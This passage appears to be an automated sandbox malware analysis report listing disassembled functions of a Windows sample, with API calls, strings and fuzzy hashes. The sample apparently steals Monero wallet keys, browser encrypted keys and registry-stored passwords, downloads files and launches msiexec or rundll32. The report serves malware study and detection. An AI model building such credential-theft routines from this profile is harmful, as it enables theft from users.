                                  • Snapshot File: hcaresult_0_2_ba0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: CreateGlobalStream
                                  • String ID: image/jpeg
                                  • API String ID: 2244384528-3785015651
                                  • Opcode ID: ead14f5ecf22a8859c482243712ab5f2b7cad516cfa720d03242b5974225d1eb
                                  • Instruction ID: fdf3bee1882758cd79c7ef5d15854497836b8f803a00c9415e1a78082b2ebeb7
                                  • Opcode Fuzzy Hash: ead14f5ecf22a8859c482243712ab5f2b7cad516cfa720d03242b5974225d1eb
                                  • Instruction Fuzzy Hash: FF71CB75D10209ABDB04EFE8DC89FEEB7F9AB48700F108548F615EB290DB74A945CB61
                                  Function 00BB2E30 Relevance: 19.7, APIs: 3, Strings: 8, Instructions: 469COMMON
                                  Download Yara Rule
                                  APIs
                                    • Part of subcall function 00BBA740: lstrcpy.KERNEL32(00BC0E17,00000000), ref: 00BBA788
                                  • ShellExecuteEx.SHELL32(0000003C), ref: 00BB31C5
                                  • ShellExecuteEx.SHELL32(0000003C), ref: 00BB335D
                                  • ShellExecuteEx.SHELL32(0000003C), ref: 00BB34EA
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2193266916.0000000000BA1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                  • Associated: 00000000.00000002.2193219558.0000000000BA0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193266916.0000000000C51000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193266916.0000000000C5D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193266916.0000000000C82000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193266916.0000000000DEA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193453262.0000000000DFE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193453262.0000000000F8F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193453262.0000000001069000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193453262.000000000108B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193453262.0000000001093000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193453262.00000000010A1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193771977.00000000010A2000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193909134.0000000001240000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193927120.0000000001241000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_ba0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: ExecuteShell$lstrcpy
                                  • String ID: /i "$ /passive$"" $.dll$.msi$<$C:\Windows\system32\msiexec.exe$C:\Windows\system32\rundll32.exe
                                  • API String ID: 2507796910-3625054190
                                  • Opcode ID: b6db571c35048a8efacd5e80bb30d0616c852edecb17ecddddd19754536fcf1c
                                  • Instruction ID: 34d385e4ab2e12777fd17288da4e008a9814ab1d7d87a20f157a810b05d6f72b
                                  • Opcode Fuzzy Hash: b6db571c35048a8efacd5e80bb30d0616c852edecb17ecddddd19754536fcf1c
                                  • Instruction Fuzzy Hash: B0129B71C10108ABDB15FBA0DCA2FFEB7B8AF14300F544199E50676591EFB46B4ACB62
                                  Function 00BB52C0 Relevance: 17.6, APIs: 5, Strings: 5, Instructions: 139stringCOMMON
                                  Download Yara Rule
                                  APIs
                                    • Part of subcall function 00BBA7A0: lstrcpy.KERNEL32(?,00000000), ref: 00BBA7E6
                                    • Part of subcall function 00BA6280: InternetOpenA.WININET(00BC0DFE,00000001,00000000,00000000,00000000), ref: 00BA62E1
                                    • Part of subcall function 00BA6280: StrCmpCA.SHLWAPI(?,01410EE0), ref: 00BA6303
                                    • Part of subcall function 00BA6280: InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00BA6335
                                    • Part of subcall function 00BA6280: HttpOpenRequestA.WININET(00000000,GET,?,01410328,00000000,00000000,00400100,00000000), ref: 00BA6385
                                    • Part of subcall function 00BA6280: InternetSetOptionA.WININET(00000000,0000001F,?,00000004), ref: 00BA63BF
                                    • Part of subcall function 00BA6280: HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00BA63D1
                                    • Part of subcall function 00BBA8A0: lstrcpy.KERNEL32(?,00BC0E17), ref: 00BBA905
                                  • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00BB5318
                                  • lstrlen.KERNEL32(00000000), ref: 00BB532F
                                    • Part of subcall function 00BB8E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00BB8E52
                                  • StrStrA.SHLWAPI(00000000,00000000), ref: 00BB5364
                                  • lstrlen.KERNEL32(00000000), ref: 00BB5383
                                  • lstrlen.KERNEL32(00000000), ref: 00BB53AE
                                    • Part of subcall function 00BBA740: lstrcpy.KERNEL32(00BC0E17,00000000), ref: 00BBA788
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2193266916.0000000000BA1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                  • Associated: 00000000.00000002.2193219558.0000000000BA0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193266916.0000000000C51000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193266916.0000000000C5D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193266916.0000000000C82000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193266916.0000000000DEA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193453262.0000000000DFE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193453262.0000000000F8F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193453262.0000000001069000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193453262.000000000108B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193453262.0000000001093000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193453262.00000000010A1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193771977.00000000010A2000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193909134.0000000001240000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193927120.0000000001241000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_ba0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Internetlstrcpylstrlen$HttpOpenRequest$AllocConnectLocalOptionSend
                                  • String ID: ERROR$ERROR$ERROR$ERROR$ERROR
                                  • API String ID: 3240024479-1526165396
                                  • Opcode ID: 6de0ce2df4aaebff5f9ef9b71439c2f6ace1a45d5db482f2d8f0e6920c79b0ee
                                  • Instruction ID: f04a80af83ee95b5c334778f89023f92c64336930b0763038691b2b9fae3aa2b
                                  • Opcode Fuzzy Hash: 6de0ce2df4aaebff5f9ef9b71439c2f6ace1a45d5db482f2d8f0e6920c79b0ee
                                  • Instruction Fuzzy Hash: 9D51CC70D10148AFCB24FF64CDA6BFD77B9AF10301F504498E4066A592EFB46B45CB62
                                  Function 00BB12D0 Relevance: 16.8, APIs: 11, Instructions: 310COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2193266916.0000000000BA1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                  • Associated: 00000000.00000002.2193219558.0000000000BA0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193266916.0000000000C51000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193266916.0000000000C5D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193266916.0000000000C82000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193266916.0000000000DEA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193453262.0000000000DFE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193453262.0000000000F8F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193453262.0000000001069000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193453262.000000000108B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193453262.0000000001093000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193453262.00000000010A1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193771977.00000000010A2000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193909134.0000000001240000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193927120.0000000001241000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_ba0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcpylstrlen
                                  • String ID:
                                  • API String ID: 2001356338-0
                                  • Opcode ID: 74dfcd97f89ab66523c2e5689db49561549884a0f3060f6ffb696f085b69566d
                                  • Instruction ID: e067bd9af57bfabcbaa79fa000187f86b912ea2a9835c73f37e99aa496a7eb8e
                                  • Opcode Fuzzy Hash: 74dfcd97f89ab66523c2e5689db49561549884a0f3060f6ffb696f085b69566d
                                  • Instruction Fuzzy Hash: 36C153B5D00219ABCB14EF64DCD9FEA77B8BB54304F0045D9E50AA7241DBB0AA85CFA1
                                  Function 00BB4280 Relevance: 16.7, APIs: 11, Instructions: 204stringCOMMON
                                  Download Yara Rule
                                  APIs
                                    • Part of subcall function 00BB8DE0: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 00BB8E0B
                                  • lstrcat.KERNEL32(?,00000000), ref: 00BB42EC
                                  • lstrcat.KERNEL32(?,01410958), ref: 00BB430B
                                  • lstrcat.KERNEL32(?,?), ref: 00BB431F
                                  • lstrcat.KERNEL32(?,0140F0B0), ref: 00BB4333
                                    • Part of subcall function 00BBA740: lstrcpy.KERNEL32(00BC0E17,00000000), ref: 00BBA788
                                    • Part of subcall function 00BB8D90: GetFileAttributesA.KERNEL32(00000000,?,00BA1B54,?,?,00BC564C,?,?,00BC0E1F), ref: 00BB8D9F
                                    • Part of subcall function 00BA9CE0: StrStrA.SHLWAPI(00000000,"encrypted_key":"), ref: 00BA9D39
                                    • Part of subcall function 00BA99C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00BA99EC
                                    • Part of subcall function 00BA99C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00BA9A11
                                    • Part of subcall function 00BA99C0: LocalAlloc.KERNEL32(00000040,?), ref: 00BA9A31
                                    • Part of subcall function 00BA99C0: ReadFile.KERNEL32(000000FF,?,00000000,00BA148F,00000000), ref: 00BA9A5A
                                    • Part of subcall function 00BA99C0: LocalFree.KERNEL32(00BA148F), ref: 00BA9A90
                                    • Part of subcall function 00BA99C0: CloseHandle.KERNEL32(000000FF), ref: 00BA9A9A
                                    • Part of subcall function 00BB93C0: GlobalAlloc.KERNEL32(00000000,00BB43DD,00BB43DD), ref: 00BB93D3
                                  • StrStrA.SHLWAPI(?,01410A18), ref: 00BB43F3
                                  • GlobalFree.KERNEL32(?), ref: 00BB4512
                                    • Part of subcall function 00BA9AC0: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,00BA4EEE,00000000,00000000), ref: 00BA9AEF
                                    • Part of subcall function 00BA9AC0: LocalAlloc.KERNEL32(00000040,?,?,?,00BA4EEE,00000000,?), ref: 00BA9B01
                                    • Part of subcall function 00BA9AC0: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,00BA4EEE,00000000,00000000), ref: 00BA9B2A
                                    • Part of subcall function 00BA9AC0: LocalFree.KERNEL32(?,?,?,?,00BA4EEE,00000000,?), ref: 00BA9B3F
                                  • lstrcat.KERNEL32(?,00000000), ref: 00BB44A3
                                  • StrCmpCA.SHLWAPI(?,00BC08D1), ref: 00BB44C0
                                  • lstrcat.KERNEL32(00000000,00000000), ref: 00BB44D2
                                  • lstrcat.KERNEL32(00000000,?), ref: 00BB44E5
                                  • lstrcat.KERNEL32(00000000,00BC0FB8), ref: 00BB44F4
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2193266916.0000000000BA1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                  • Associated: 00000000.00000002.2193219558.0000000000BA0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193266916.0000000000C51000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193266916.0000000000C5D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193266916.0000000000C82000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193266916.0000000000DEA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193453262.0000000000DFE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193453262.0000000000F8F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193453262.0000000001069000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193453262.000000000108B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193453262.0000000001093000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193453262.00000000010A1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193771977.00000000010A2000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193909134.0000000001240000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193927120.0000000001241000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_ba0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcat$FileLocal$AllocFree$BinaryCryptGlobalString$AttributesCloseCreateFolderHandlePathReadSizelstrcpy
                                  • String ID:
                                  • API String ID: 3541710228-0
                                  • Opcode ID: e9ea036bc6aeba47e9e76f47f71de33138fe1c609c8ee68536c92f56c1f41c07
                                  • Instruction ID: de804dcdec7cfb4ae2b0824a0b890a1df6ea9e5341f00611dff636387355a616
                                  • Opcode Fuzzy Hash: e9ea036bc6aeba47e9e76f47f71de33138fe1c609c8ee68536c92f56c1f41c07
                                  • Instruction Fuzzy Hash: 1F7123B6900208ABDB14FBA4DC95FEE77BDAB58300F0445D8F605A7181EA74EB45CBA1
                                  Function 00BA1310 Relevance: 15.9, APIs: 5, Strings: 4, Instructions: 141stringfileCOMMON
                                  Download Yara Rule
                                  APIs
                                    • Part of subcall function 00BA12A0: GetProcessHeap.KERNEL32(00000000,00000104), ref: 00BA12B4
                                    • Part of subcall function 00BA12A0: RtlAllocateHeap.NTDLL(00000000), ref: 00BA12BB
                                    • Part of subcall function 00BA12A0: RegOpenKeyExA.ADVAPI32(000000FF,?,00000000,00020119,?), ref: 00BA12D7
                                    • Part of subcall function 00BA12A0: RegQueryValueExA.ADVAPI32(?,000000FF,00000000,00000000,?,000000FF), ref: 00BA12F5
                                    • Part of subcall function 00BA12A0: RegCloseKey.ADVAPI32(?), ref: 00BA12FF
                                  • lstrcat.KERNEL32(?,00000000), ref: 00BA134F
                                  • lstrlen.KERNEL32(?), ref: 00BA135C
                                  • lstrcat.KERNEL32(?,.keys), ref: 00BA1377
                                    • Part of subcall function 00BBA740: lstrcpy.KERNEL32(00BC0E17,00000000), ref: 00BBA788
                                    • Part of subcall function 00BBA9B0: lstrlen.KERNEL32(?,01409EC0,?,\Monero\wallet.keys,00BC0E17), ref: 00BBA9C5
                                    • Part of subcall function 00BBA9B0: lstrcpy.KERNEL32(00000000), ref: 00BBAA04
                                    • Part of subcall function 00BBA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00BBAA12
                                    • Part of subcall function 00BBA8A0: lstrcpy.KERNEL32(?,00BC0E17), ref: 00BBA905
                                    • Part of subcall function 00BB8B60: GetSystemTime.KERNEL32(00BC0E1A,0140FD60,00BC05AE,?,?,00BA13F9,?,0000001A,00BC0E1A,00000000,?,01409EC0,?,\Monero\wallet.keys,00BC0E17), ref: 00BB8B86
                                    • Part of subcall function 00BBA920: lstrcpy.KERNEL32(00000000,?), ref: 00BBA972
                                    • Part of subcall function 00BBA920: lstrcat.KERNEL32(00000000), ref: 00BBA982
                                  • CopyFileA.KERNEL32(?,00000000,00000001), ref: 00BA1465
                                    • Part of subcall function 00BBA7A0: lstrcpy.KERNEL32(?,00000000), ref: 00BBA7E6
                                    • Part of subcall function 00BA99C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00BA99EC
                                    • Part of subcall function 00BA99C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00BA9A11
                                    • Part of subcall function 00BA99C0: LocalAlloc.KERNEL32(00000040,?), ref: 00BA9A31
                                    • Part of subcall function 00BA99C0: ReadFile.KERNEL32(000000FF,?,00000000,00BA148F,00000000), ref: 00BA9A5A
                                    • Part of subcall function 00BA99C0: LocalFree.KERNEL32(00BA148F), ref: 00BA9A90
                                    • Part of subcall function 00BA99C0: CloseHandle.KERNEL32(000000FF), ref: 00BA9A9A
                                  • DeleteFileA.KERNEL32(00000000), ref: 00BA14EF
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2193266916.0000000000BA1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                  • Associated: 00000000.00000002.2193219558.0000000000BA0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193266916.0000000000C51000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193266916.0000000000C5D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193266916.0000000000C82000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193266916.0000000000DEA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193453262.0000000000DFE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193453262.0000000000F8F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193453262.0000000001069000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193453262.000000000108B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193453262.0000000001093000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193453262.00000000010A1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193771977.00000000010A2000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193909134.0000000001240000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193927120.0000000001241000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_ba0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Filelstrcpy$lstrcat$CloseHeapLocallstrlen$AllocAllocateCopyCreateDeleteFreeHandleOpenProcessQueryReadSizeSystemTimeValue
                                  • String ID: .keys$SOFTWARE\monero-project\monero-core$\Monero\wallet.keys$wallet_path
                                  • API String ID: 3478931302-218353709
                                  • Opcode ID: cc2722c7173d858bc5682363e2924614c43adbb0304e7bc6bd7a3530b5dee0c2
                                  • Instruction ID: a189b16dbf79bfe682a15797095b953089b2fa72062e5b2480149bc53e83b2a5
                                  • Opcode Fuzzy Hash: cc2722c7173d858bc5682363e2924614c43adbb0304e7bc6bd7a3530b5dee0c2
                                  • Instruction Fuzzy Hash: 9E5146B1D501196BCB15FB60DDA2FFD73BC9F54300F4045D8B60AA6092EE706B89CBA6
                                  Function 00BA75D0 Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 91stringCOMMON
                                  Download Yara Rule
                                  APIs
                                    • Part of subcall function 00BA72D0: RegOpenKeyExA.ADVAPI32(80000001,?,00000000,00020019,?), ref: 00BA733A
                                    • Part of subcall function 00BA72D0: RegEnumValueA.ADVAPI32(?,00000000,00000000,000000FF,00000000,00000003,?,?), ref: 00BA73B1
                                    • Part of subcall function 00BA72D0: StrStrA.SHLWAPI(00000000,Password,00000000), ref: 00BA740D
                                    • Part of subcall function 00BA72D0: GetProcessHeap.KERNEL32(00000000,?), ref: 00BA7452
                                    • Part of subcall function 00BA72D0: HeapFree.KERNEL32(00000000), ref: 00BA7459
                                  • lstrcat.KERNEL32(00000000,00BC17FC), ref: 00BA7606
                                  • lstrcat.KERNEL32(00000000,00000000), ref: 00BA7648
                                  • lstrcat.KERNEL32(00000000, : ), ref: 00BA765A
                                  • lstrcat.KERNEL32(00000000,00000000), ref: 00BA768F
                                  • lstrcat.KERNEL32(00000000,00BC1804), ref: 00BA76A0
                                  • lstrcat.KERNEL32(00000000,00000000), ref: 00BA76D3
                                  • lstrcat.KERNEL32(00000000,00BC1808), ref: 00BA76ED
                                  • task.LIBCPMTD ref: 00BA76FB
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2193266916.0000000000BA1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                  • Associated: 00000000.00000002.2193219558.0000000000BA0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193266916.0000000000C51000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193266916.0000000000C5D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193266916.0000000000C82000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193266916.0000000000DEA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193453262.0000000000DFE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193453262.0000000000F8F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193453262.0000000001069000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193453262.000000000108B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193453262.0000000001093000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193453262.00000000010A1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193771977.00000000010A2000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193909134.0000000001240000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193927120.0000000001241000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_ba0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcat$Heap$EnumFreeOpenProcessValuetask
                                  • String ID: :
                                  • API String ID: 2677904052-3653984579
                                  • Opcode ID: c52175cbfe956913f6f26faa33e55d84e955bb47fc2335900a1a0e4afc06eee8
                                  • Instruction ID: 38141b0a7320a21b14bdef5a8cce7f2c9ac416ab686caa7e6ad3f3155a7f810e
                                  • Opcode Fuzzy Hash: c52175cbfe956913f6f26faa33e55d84e955bb47fc2335900a1a0e4afc06eee8
                                  • Instruction Fuzzy Hash: 8D314F71D0824ADFCB04FBA8DCD5EFE73B8AB4A301B144158F102EB251DE34A946DB61
                                  Function 00BB8100 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 67memoryCOMMON
                                  Download Yara Rule
                                  APIs
                                  • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,00000000,00000000,?,01410730,00000000,?,00BC0E2C,00000000,?,00000000), ref: 00BB8130
                                  • RtlAllocateHeap.NTDLL(00000000), ref: 00BB8137
                                  • GlobalMemoryStatusEx.KERNEL32(00000040,00000040,00000000), ref: 00BB8158
                                  • __aulldiv.LIBCMT ref: 00BB8172
                                  • __aulldiv.LIBCMT ref: 00BB8180
                                  • wsprintfA.USER32 ref: 00BB81AC
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2193266916.0000000000BA1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                  • Associated: 00000000.00000002.2193219558.0000000000BA0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193266916.0000000000C51000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193266916.0000000000C5D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193266916.0000000000C82000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193266916.0000000000DEA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193453262.0000000000DFE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193453262.0000000000F8F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193453262.0000000001069000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193453262.000000000108B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193453262.0000000001093000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193453262.00000000010A1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193771977.00000000010A2000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193909134.0000000001240000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193927120.0000000001241000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_ba0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Heap__aulldiv$AllocateGlobalMemoryProcessStatuswsprintf
                                  • String ID: %d MB$@
                                  • API String ID: 2774356765-3474575989
                                  • Opcode ID: e27dd8161fd3bc9f0baabb834139e0675772caaee090cf541159536c6da40354
                                  • Instruction ID: ade4c40aef26a4c56b6a71a6f81656ff40fde063d5d97785eed5ba9d66c1feee
                                  • Opcode Fuzzy Hash: e27dd8161fd3bc9f0baabb834139e0675772caaee090cf541159536c6da40354
                                  • Instruction Fuzzy Hash: DB21FCB1944259ABDB00DFD8CC89FAEB7B8EB44710F104559F605BB280D7B869018BA5
                                  Function 00BA60A0 Relevance: 13.6, APIs: 9, Instructions: 133networkfileCOMMON
                                  Download Yara Rule
                                  APIs
                                    • Part of subcall function 00BBA7A0: lstrcpy.KERNEL32(?,00000000), ref: 00BBA7E6
                                    • Part of subcall function 00BA47B0: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 00BA4839
                                    • Part of subcall function 00BA47B0: InternetCrackUrlA.WININET(00000000,00000000), ref: 00BA4849
                                  • InternetOpenA.WININET(00BC0DF7,00000001,00000000,00000000,00000000), ref: 00BA610F
                                  • StrCmpCA.SHLWAPI(?,01410EE0), ref: 00BA6147
                                  • InternetOpenUrlA.WININET(00000000,00000000,00000000,00000000,00000100,00000000), ref: 00BA618F
                                  • CreateFileA.KERNEL32(00000000,40000000,00000003,00000000,00000002,00000080,00000000), ref: 00BA61B3
                                  • InternetReadFile.WININET(?,?,00000400,?), ref: 00BA61DC
                                  • WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 00BA620A
                                  • CloseHandle.KERNEL32(?,?,00000400), ref: 00BA6249
                                  • InternetCloseHandle.WININET(?), ref: 00BA6253
                                  • InternetCloseHandle.WININET(00000000), ref: 00BA6260
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2193266916.0000000000BA1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                  • Associated: 00000000.00000002.2193219558.0000000000BA0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193266916.0000000000C51000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193266916.0000000000C5D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193266916.0000000000C82000.00000040.00000001.01000000.00000003.sdmpDownload File
